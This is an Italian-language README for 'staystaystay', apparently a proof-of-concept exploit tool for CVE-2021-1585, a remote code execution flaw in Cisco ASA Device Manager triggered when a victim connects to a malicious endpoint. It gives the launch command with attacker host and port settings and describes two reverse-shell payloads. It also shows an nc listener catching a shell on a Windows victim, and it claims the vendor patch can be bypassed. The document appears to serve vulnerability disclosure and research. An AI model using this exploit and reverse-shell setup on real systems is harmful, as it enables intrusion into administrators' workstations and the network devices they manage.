
Prova di concetto per CVE-2021-1585: Cisco ASA Device Manager RCE
staystaystay è un exploit proof of concept per CVE-2021-1585, un problema di RCE (Remote Code Execution) da man-in-the-middle o endpoint malintenzionato che affligge Cisco ASA Device Manager (ASDM). Il problema è stato scoperto originariamente da Malcolm Lashley e divulgato nell'estate del 2021. Tuttavia, mentre stavo esaminando la questione, era ancora non corretto nell'ultima versione (ASDM 7.17(1)); ci sono incappato in modo indipendente.
Cisco ha "corretto" il problema in ASDM 7.18(1.152). Dico "corretto" perché questo exploit funziona ancora perfettamente. L'utente dovrà solo fare clic su "Sì". Guarda un video qui sotto.
Gli aggressori possono configurare due tipi di payload per ottenere una reverse shell sulla vittima:
Se una vittima connette il proprio ASDM a staystaystay, verrà iniettato il payload configurato, producendo una reverse shell. La reverse shell jjs può essere catturata con un tipico listener nc (o anche con Metasploit, se preferisci). L'opzione Longtime Sunshine richiede che l'aggressore usi tale framework.
Ad esempio, il seguente comando avvierà staystaystay sulla porta 8443 con il payload jjs:
./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443
Una volta che la vittima si connette alla porta 8443, verrà generata una reverse shell verso 10.0.0.2:1270:
albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster
C:\Program Files (x86)\Cisco Systems\ASDM>
Il seguente video contiene un esempio di sfruttamento con Longtime Sunshine:
Il seguente video dimostra l'attacco contro una versione patchata:
Un write-up di AttackerKB è disponibile qui: